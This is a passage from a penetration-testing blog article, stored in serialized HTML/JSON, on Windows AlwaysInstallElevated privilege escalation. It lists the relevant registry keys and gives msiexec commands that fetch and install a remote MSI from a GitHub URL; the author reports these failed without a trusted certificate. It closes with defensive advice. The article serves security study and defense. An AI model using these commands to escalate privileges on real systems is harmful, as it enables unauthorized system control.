Everyone:\u003C\u002Fp>\u003Cul>\u003Cli>HKCU\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer\u003C\u002Fli>\u003Cli>HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer\u003C\u002Fli>\u003C\u002Ful>\u003Cp>For methods on adding ACLs to registry entries, refer to the previous article: 'Penetration Techniques - Access Control List in Windows'.\u003C\u002Fp>\u003Ch3>Expansion Idea 3:\u003C\u002Fh3>\u003Cp>msiexec supports remote download and execution, so can it be leveraged with AlwaysInstallElevated for privilege escalation?\u003C\u002Fp>\u003Cp>Test command is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>msiexec \u002Fq \u002Fi https:\u002F\u002Fraw.githubusercontent.com\u002F3gstudent\u002Ftest\u002Fmaster\u002FRunProcessHacker.msi\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Execution failed\u003C\u002Fp>\u003Cp>Next, investigate the cause, display the installation process, test command is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>msiexec \u002Fi https:\u002F\u002Fraw.githubusercontent.com\u002F3gstudent\u002Ftest\u002Fmaster\u002FRunProcessHacker.msi\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Prompt indicates the source is untrusted, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770018826703_8_0f6d7db0df-1.jpeg\">\u003C\u002Fp>\u003Cp>Conclusion:\u003C\u002Fp>\u003Cp>MSI files require a trusted certificate for remote exploitation of AlwaysInstallElevated privilege escalation\u003C\u002Fp>\u003Ch2>0x06 Defense Recommendations\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>If there is no specific requirement, disable AlwaysInstallElevated\u003C\u002Fp>\u003Cp>Monitor registry keys:\u003C\u002Fp>\u003Cul>\u003Cli>HKCU\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer\u003C\u002Fli>\u003Cli>HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x07 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article introduces the privilege escalation method using AlwaysInstallElevated, identifies the reasons for the failure of exploiting MSI files generated by Metasploit, and finally explains how to generate exploitable MSI files using MSI Wrapper\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>",1374,"Onedaysec",5,"published","2026-02-02T08:06:59.472Z",{"title":37,"description":14,"keywords":38,"ogImage":39,"canonicalUrl":39,"noIndex":40},"AlwaysInstallElevated Privilege Escalation: Testing & Solutions","privilege escalation, AlwaysInstallElevated, Windows security, Metasploit, PowerUp, msi exploitation, system privileges, penetration testing",null,false,[],{"docs":43,"hasNextPage":40},[4,44,45,46],313,312,311,{"title":39,"description":39,"image":39},"2026-07-24T15:37:14.216Z","2026-07-23T16:01:22.097Z","draft","2026-07-23T16:05:17.331Z"]